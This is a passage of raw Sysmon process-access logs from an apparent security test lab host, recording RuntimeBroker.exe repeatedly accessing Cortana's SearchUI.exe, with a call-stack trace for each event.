10341000x800000000000000011808Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.904{08A6967A-4753-6000-0D05-000000009A01}11165948C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.storage.dll+63fa1|C:\Windows\System32\windows.storage.dll+669f8|C:\Windows\System32\windows.storage.dll+7b6e4|C:\Windows\System32\windows.storage.dll+17478b|C:\Windows\system32\windows.cortana.Desktop.dll+fbaa|C:\Windows\system32\windows.cortana.Desktop.dll+f80b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+507df|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba 10341000x800000000000000011807Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.904{08A6967A-4753-6000-0D05-000000009A01}11166104C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\windows.cortana.Desktop.dll+41792|C:\Windows\system32\windows.cortana.Desktop.dll+41550|C:\Windows\system32\windows.cortana.Desktop.dll+9248|C:\Windows\system32\windows.cortana.Desktop.dll+12c21|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d 10341000x800000000000000011806Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.904{08A6967A-4753-6000-0D05-000000009A01}11166096C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\windows.cortana.Desktop.dll+41792|C:\Windows\system32\windows.cortana.Desktop.dll+41550|C:\Windows\system32\windows.cortana.Desktop.dll+9248|C:\Windows\system32\windows.cortana.Desktop.dll+12c21|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d 10341000x800000000000000011805Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.904{08A6967A-4753-6000-0D05-000000009A01}11165548C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\windows.cortana.Desktop.dll+41792|C:\Windows\system32\windows.cortana.Desktop.dll+41838|C:\Windows\system32\windows.cortana.Desktop.dll+164d7|C:\Windows\system32\windows.cortana.Desktop.dll+12c8b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d 10341000x800000000000000011804Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.904{08A6967A-4753-6000-0D05-000000009A01}11165548C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\windows.cortana.Desktop.dll+41792|C:\Windows\system32\windows.cortana.Desktop.dll+41550|C:\Windows\system32\windows.cortana.Desktop.dll+9248|C:\Windows\system32\windows.cortana.Desktop.dll+12c21|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d 10341000x800000000000000011803Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.904{08A6967A-4753-6000-0D05-000000009A01}11166052C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\windows.cortana.Desktop.dll+41792|C:\Windows\system32\windows.cortana.Desktop.dll+41838|C:\Windows\system32\windows.cortana.Desktop.dll+164d7|C:\Windows\system32\windows.cortana.Desktop.dll+12c8b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d 10341000x800000000000000011802Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.904{08A6967A-4753-6000-0D05-000000009A01}11165948C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.storage.dll+63fa1|C:\Windows\System32\windows.storage.dll+fd3d6|C:\Windows\System32\windows.storage.dll+fed38|C:\Windows\system32\windows.cortana.Desktop.dll+f90c|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+507df|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000011801Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.904{08A6967A-4753-6000-0D05-000000009A01}11166052C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\windows.cortana.Desktop.dll+41792|C:\Windows\system32\windows.cortana.Desktop.dll+41550|C:\Windows\system32\windows.cortana.Desktop.dll+9248|C:\Windows\system32\windows.cortana.Desktop.dll+12c21|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d 10341000x800000000000000011800Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.904{08A6967A-4753-6000-0D05-000000009A01}11165948C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.storage.dll+63fa1|C:\Windows\System32\windows.storage.dll+669f8|C:\Windows\System32\windows.storage.dll+7b6e4|C:\Windows\System32\windows.storage.dll+17478b|C:\Windows\system32\windows.cortana.Desktop.dll+fbaa|C:\Windows\system32\windows.cortana.Desktop.dll+f80b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+507df|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba 10341000x800000000000000011799Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.904{08A6967A-4753-6000-0D05-000000009A01}11166068C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\windows.cortana.Desktop.dll+41792|C:\Windows\system32\windows.cortana.Desktop.dll+41838|C:\Windows\system32\windows.cortana.Desktop.dll+164d7|C:\Windows\system32\windows.cortana.Desktop.dll+12c8b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d 10341000x800000000000000011798Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.904{08A6967A-4753-6000-0D05-000000009A01}11166068C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\windows.cortana.Desktop.dll+41792|C:\Windows\system32\windows.cortana.Desktop.dll+41550|C:\Windows\system32\windows.cortana.Desktop.dll+9248|C:\Windows\system32\windows.cortana.Desktop.dll+12c21|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d 10341000x800000000000000011797Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.904{08A6967A-4753-6000-0D05-000000009A01}11164952C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\windows.cortana.Desktop.dll+41792|C:\Windows\system32\windows.cortana.Desktop.dll+41838|C:\Windows\system32\windows.cortana.Desktop.dll+164d7|C:\Windows\system32\windows.cortana.Desktop.dll+12c8b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d 10341000x800000000000000011796Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.904{08A6967A-4753-6000-0D05-000000009A01}11164952C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\windows.cortana.Desktop.dll+41792|C:\Windows\system32\windows.cortana.Desktop.dll+41550|C:\Windows\system32\windows.cortana.Desktop.dll+9248|C:\Windows\system32\windows.cortana.Desktop.dll+12c21|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d 10341000x800000000000000011795Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.904{08A6967A-4753-6000-0D05-000000009A01}11165576C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\windows.cortana.Desktop.dll+41792|C:\Windows\system32\windows.cortana.Desktop.dll+41838|C:\Windows\system32\windows.cortana.Desktop.dll+164d7|C:\Windows\system32\windows.cortana.Desktop.dll+12c8b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d 10341000x800000000000000011794Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.904{08A6967A-4753-6000-0D05-000000009A01}11165576C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\windows.cortana.Desktop.dll+41792|C:\Windows\system32\windows.cortana.Desktop.dll+41550|C:\Windows\system32\windows.cortana.Desktop.dll+9248|C:\Windows\system32\windows.cortana.Desktop.dll+12c21|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d 10341000x800000000000000011793Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.904{08A6967A-4753-6000-0D05-000000009A01}11166008C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\windows.cortana.Desktop.dll+41792|C:\Windows\system32\windows.cortana.Desktop.dll+41838|C:\Windows\system32\windows.cortana.Desktop.dll+164d7|C:\Windows\system32\windows.cortana.Desktop.dll+12c8b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d 10341000x800000000000000011792Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.904{08A6967A-4753-6000-0D05-000000009A01}11166008C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\windows.cortana.Desktop.dll+41792|C:\Windows\system32\windows.cortana.Desktop.dll+41550|C:\Windows\system32\windows.cortana.Desktop.dll+9248|C:\Windows\system32\windows.cortana.Desktop.dll+12c21|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d 10341000x800000000000000011791Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.904{08A6967A-4753-6000-0D05-000000009A01}11166052C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\windows.cortana.Desktop.dll+41792|C:\Windows\system32\windows.cortana.Desktop.dll+41838|C:\Windows\system32\windows.cortana.Desktop.dll+164d7|C:\Windows\system32\windows.cortana.Desktop.dll+12c8b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d 10341000x800000000000000011790Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.904{08A6967A-4753-6000-0D05-000000009A01}11166028C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\windows.cortana.Desktop.dll+41792|C:\Windows\system32\windows.cortana.Desktop.dll+41838|C:\Windows\system32\windows.cortana.Desktop.dll+164d7|C:\Windows\system32\windows.cortana.Desktop.dll+12c8b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d 10341000x800000000000000011789Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.904{08A6967A-4753-6000-0D05-000000009A01}11166052C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\windows.cortana.Desktop.dll+41792|C:\Windows\system32\windows.cortana.Desktop.dll+41550|C:\Windows\system32\windows.cortana.Desktop.dll+9248|C:\Windows\system32\windows.cortana.Desktop.dll+12c21|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\W